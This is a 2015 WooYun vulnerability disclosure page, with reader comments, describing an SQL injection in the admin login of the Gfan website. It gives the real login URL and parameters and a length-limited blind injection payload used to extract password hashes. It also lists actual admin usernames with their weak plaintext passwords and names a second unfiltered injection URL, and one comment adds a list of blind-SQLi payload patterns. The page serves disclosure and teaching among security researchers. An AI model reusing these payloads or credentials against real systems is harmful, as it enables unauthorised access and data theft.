当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(125) 关注此漏洞

缺陷编号: WooYun-2015-101960

漏洞标题: 机锋网后台存在SQL注入漏洞(注射技巧bypass字符长度限制)

相关厂商: 机锋网

漏洞作者: 子非海绵宝宝认证白帽子

提交时间: 2015-03-17 22:34

公开时间: 2015-03-22 22:36

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

31人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-17: 细节已通知厂商并且等待厂商处理中
2015-03-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
感谢@Noxxx 大神的指点
报错注入变成32位字符限制注入

详细说明:

code 区域
http://admin.tsz.gfan.com/login.php?act=logging



code 区域
username=wangxi&password=123&auth=6268





这里的注入比较有意思

1.jpg



报错注入

但是....

2.jpg



他检查了长度 也就是说注入的完整语句不能超过32个字符

报错是肯定不够的 只能盲注

code 区域
select * from `condorgame_managers` where `username`='123'' LIMIT 1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123'' LIMIT 1' at line 1 1064











看下的语句

那么可以这么写

code 区域
duyun'&&SUBSTR(passwd,1,1)='a



使得语句变成

select * from `condorgame_managers` where `username`='duyun'&&SUBSTR(passwd,1,1)='a'

这样语句是29个字符 可以注入了

并且可以猜出密码的MD5值

用户名直接使用常用用户名进行爆破



duyun 123456

wangyu 123!@#

wangxi 321321



还都是弱密码



其中wangyu 123!@# 权限较大 可以操作的东西比较多

3.jpg





在其中找到新的注入点 且没有限制 盲注

code 区域
http://admin.tsz.gfan.com/index.php?offset=15&mod=product&act=edit&time=&serverid=1023





4.jpg

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 子非海绵宝宝@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-22 22:36

厂商回复:

漏洞Rank:10 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-03-17 22:36 | Ton7BrEak ( 普通白帽子 | Rank:292 漏洞数:64 | 我要继续努力!)
    0

    加乌云了~打雷了 快回家收衣服啦!mark一下,当做教程。 @水晶 好东西,妹纸快来看

  2. 2015-03-17 22:38 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:941 漏洞数:108 )
    0

    强到不行!!

  3. 2015-03-17 22:43 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
    0

    。。。。。 不玩众测来主站啊

  4. 2015-03-17 22:44 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    0

    @zeracker 无意发现的....就交主站了

  5. 2015-03-17 22:53 | BMa 认证白帽子 ( 核心白帽子 | Rank:2014 漏洞数:223 )
    0

    @子非海绵宝宝 ||这种字符?

  6. 2015-03-17 23:04 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)
    0

    NB!

  7. 2015-03-17 23:48 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步,是要承认问题的存在。)
    0

    果断关注!

  8. 2015-03-18 09:05 | 明月影 ( 路人 | Rank:12 漏洞数:8 )
    0

    雷劈了一下。太乌云了。

  9. 2015-03-18 09:14 | light ( 普通白帽子 | Rank:261 漏洞数:48 | 精华漏洞数:36 | WooYun认证√ 艺术系教授 ...)
    0

    mark 坐等神技

  10. 2015-03-18 09:26 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)
    0

    围观大神

  11. 2015-03-18 09:33 | 我哪知道啊 ( 路人 | Rank:0 漏洞数:1 )
    0

    mark

  12. 2015-03-18 10:37 | f4ckbaidu ( 普通白帽子 | Rank:243 漏洞数:32 | 开发真是日了狗了)
    0

    mark学习

  13. 2015-03-18 11:45 | 3King ( 核心白帽子 | Rank:1158 漏洞数:96 | 【study at HNUST】非常感谢大家的关注~ 大...)
    0

    6666666

  14. 2015-03-18 11:45 | 大大灰狼 ( 普通白帽子 | Rank:278 漏洞数:64 | Newbie)
    0

    mark

  15. 2015-03-18 11:47 | winalva ( 实习白帽子 | Rank:42 漏洞数:11 | rank是什么?)
    0

    mark学习

  16. 2015-03-18 12:13 | 小川 认证白帽子 ( 核心白帽子 | Rank:1583 漏洞数:236 | 一个致力要将乌云变成搞笑论坛的男人)
    0

    学习

  17. 2015-03-18 14:42 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @子非海绵宝宝 good!

  18. 2015-03-18 15:35 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)
    0

    666666666

  19. 2015-03-18 15:47 | gone ( 路人 | Rank:0 漏洞数:1 | 来学习的)
    0

    学习

  20. 2015-03-19 11:06 | 水晶 ( 实习白帽子 | Rank:58 漏洞数:22 | 热爱生活,喜欢互联网)
    0

    @Ton7BrEak OK

  21. 2015-03-19 15:58 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    0

    @机锋网 后交的都确认了 这个怎么没确认?

  22. 2015-03-22 20:17 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    0

    @xsser 求补RANK

  23. 2015-03-22 22:40 | 机锋网(乌云厂商)
    0

    确认,正在解决,谢谢了

  24. 2015-03-22 22:54 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    0

    @机锋网 超时后4分钟就回复了....还我RANK....双倍!

  25. 2015-03-22 23:08 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:941 漏洞数:108 )
    0

    @子非海绵宝宝 深藏功与名

  26. 2015-03-22 23:08 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1504 漏洞数:156 )
    0

    这个确实改补

  27. 2015-03-22 23:10 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:941 漏洞数:108 )
    0

    有点意思啊.

  28. 2015-03-23 00:16 | Knight ( 实习白帽子 | Rank:66 漏洞数:11 | 刚刚上洗手间,看到一个玉树临风的少年,气...)
    0

    目测穿山甲。

  29. 2015-03-23 08:19 | BMa 认证白帽子 ( 核心白帽子 | Rank:2014 漏洞数:223 )
    0

    @子非海绵宝宝 看来我说对了,|| &&

  30. 2015-03-23 09:19 | 水晶 ( 实习白帽子 | Rank:58 漏洞数:22 | 热爱生活,喜欢互联网)
    0

    @Ton7BrEak OK

  31. 2015-03-23 09:27 | zzR 认证白帽子 ( 核心白帽子 | Rank:1408 漏洞数:125 | 东方红**联盟欢迎你-0-)
    0

    故意的╭(╯^╰)╮

  32. 2015-03-23 09:30 | Ton7BrEak ( 普通白帽子 | Rank:292 漏洞数:64 | 我要继续努力!)
    0

    厂商忽略的好啊~提前学到了~ (洞主很无奈啊!)

  33. 2015-03-23 16:28 | xtnnd ( 普通白帽子 | Rank:184 漏洞数:45 | t-safe)
    0

    @疯狗 求审核 http://www.wooyun.org/bugs/wooyun-2015-0100938/trace/ab0e5e5792df40ff91c799a791437d73 http://www.wooyun.org/bugs/wooyun-2015-0103231/trace/81e4491c6f9b67c90badb817042f0a01

  34. 2015-03-23 19:07 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)
    0

    学习了!

  35. 2015-03-26 13:03 | me1ody ( 普通白帽子 | Rank:121 漏洞数:35 | 乌云临时工)
    0

    学习了 玩游戏

  36. 2015-03-28 09:46 | 炮灰乙 ( 路人 | Rank:8 漏洞数:5 | 我叫路人甲,我住在中国)
    0

    这没有bypass啊 只能爆密码 我还以为从其它参数配合带进sql语句或者把一条sql拆成N条

  37. 2015-04-03 00:51 | _Evil ( 普通白帽子 | Rank:431 漏洞数:61 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
    0

    mid(data,1,1) = 'a'# substring(data,1,1) = 'a'# AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now()))) ' or 1 rlike '1 Some functions allow to search substrings: '-if(locate('f',data),1,0)# '-if(locate('fo',data),1,0)# '-if(locate('foo',data),1,0)# ● Some functions allow to cut substrings: length(trim(leading 'a' FROM data)) # length will be shorter length(replace(data, 'a', '')) # length will be shorter

  38. 2015-08-20 19:52 | Burn Egg ( 实习白帽子 | Rank:80 漏洞数:10 | 经验,范围,字典,思维)
    0

    @子非海绵宝宝 长度限制应该也可以用passwd like 'a%',,

登录后才能发表评论,请先 登录